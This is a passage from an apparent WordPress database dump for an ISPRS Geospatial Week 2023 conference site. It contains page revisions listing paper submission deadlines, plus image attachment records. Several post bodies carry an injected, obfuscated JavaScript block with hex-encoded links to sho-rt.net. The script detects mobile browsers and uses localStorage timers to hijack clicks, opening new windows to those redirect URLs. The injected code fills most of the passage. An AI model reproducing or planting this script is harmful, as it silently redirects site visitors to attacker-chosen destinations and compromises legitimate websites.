_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-01-29 01:59:17','2023-01-29 01:59:17','',3066,'https://gsw2023.com/?p=3660',0,'revision','',0),
(3661,1,'2023-01-29 02:31:40','2023-01-29 02:31:40','','Egyptian Pyramids In Sand Desert And Clear Sky','Egyptian pyramids in sand desert and clear sky','inherit','open','closed','','egyptian-pyramids-in-sand-desert-and-clear-sky-7','','','2023-01-29 02:31:40','2023-01-29 02:31:40','',3066,'https://gsw2023.com/wp-content/uploads/2023/01/egyptian-pyramids_m-1.jpg',0,'attachment','image/jpeg',0),
(3662,1,'2023-01-29 02:33:22','2023-01-29 02:33:22','','Egyptian Pyramids In Sand Desert And Clear Sky','Egyptian pyramids in sand desert and clear sky','inherit','open','closed','','egyptian-pyramids-in-sand-desert-and-clear-sky-8','','','2023-01-29 02:33:22','2023-01-29 02:33:22','',3066,'https://gsw2023.com/wp-content/uploads/2023/01/egyptian-pyramids_m-2.jpg',0,'attachment','image/jpeg',0),
(3663,1,'2023-01-29 02:35:44','2023-01-29 02:35:44','','Egyptian Pyramids In Sand Desert And Clear Sky','Egyptian pyramids in sand desert and clear sky','inherit','open','closed','','egyptian-pyramids-in-sand-desert-and-clear-sky-9','','','2023-01-29 02:35:44','2023-01-29 02:35:44','',3066,'https://gsw2023.com/wp-content/uploads/2023/01/egyptian-pyramids_m-3.jpg',0,'attachment','image/jpeg',0),
(3665,1,'2023-01-30 07:01:43','2023-01-30 07:01:43','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><span style=\"font-size: 18pt;\"><strong>ISPRS Geospatial Week: 2-7 September 2023</strong></span></h5>\n<h1><b><span style=\"font-size: 18pt;\">Important Dates:</span><u></u><u></u></b></h1>\n<h4>\n1. Annales (Fully Reviewed Papers):</h4>\n<h4> Full paper submission (Annals): March 31, 2023 (hard deadline, no extension)<br />\n Full paper Author notification: May 1, 2023<br />\n Camera ready paper submission: June 1, 2023</h4>\n<h4>\n2. Archives (Abstract Reviewed Papers):</h4>\n<h4> Abstracts submission (Archives): April 15, 2023 (hard deadline, no extension)<br />\n Abstracts Author notification: May 15, 2023<br />\n Camera ready paper submission: June 1, 2023</h4>\n<p class=\"m_7392195451776563107MsoListParagraphCxSpLast\">\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','IMPORTANT DATES','','inherit','closed','closed','','2654-revision-v1','','','2023-01-30 07:01:43','2023-01-30 07:01:43','',2654,'https://gsw2023.com/?p=3665',0,'revision','',0),
(3666,1,'2023-01-30 07:05:02','2023-01-30 07:05:02','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><span style=\"font-size: 18pt;\"><strong>ISPRS Geospatial Week: 2-7 September 2023</strong></span></h5>\n<h1><b><span style=\"font-size: 18pt;\">Important Dates:</span><u></u><u></u></b></h1>\n<h4>\n1. Annales (Fully Reviewed Papers):</h4>\n<h6> Full paper submission (Annals): March 31, 2023 (hard deadline, no extension)</h6>\n<h6> Full paper Author notification: May 1, 2023</h6>\n<h6> Camera ready paper submission: June 1, 2023</h6>\n<h4>\n2. Archives (Abstract Reviewed Papers):</h4>\n<h6> Abstracts submission (Archives): April 15, 2023 (hard deadline, no extension)</h6>\n<h6> Abstracts Author notification: May 15, 2023</h6>\n<h6> Camera ready paper submission: June 1, 2023</h6>\n<p class=\"m_7392195451776563107MsoListParagraphCxSpLast\">\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 